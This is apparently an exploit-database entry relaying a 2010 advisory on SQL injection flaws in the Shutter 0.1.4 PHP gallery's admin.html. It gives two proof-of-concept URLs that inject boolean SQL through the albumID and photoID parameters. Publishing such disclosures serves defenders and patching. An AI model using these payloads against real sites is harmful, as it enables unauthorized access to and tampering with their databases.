[] NeoSense

tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections

Author: blake
type: webapps
platform: php
port: 
date_added: 2010-03-18 
date_updated: 2014-06-16 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/38849/info

tenfourzero.net's Shutter is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Shutter 0.1.4 is vulnerable; other versions may also be affected.

http://www.example.com/shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5
http://www.example.com/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5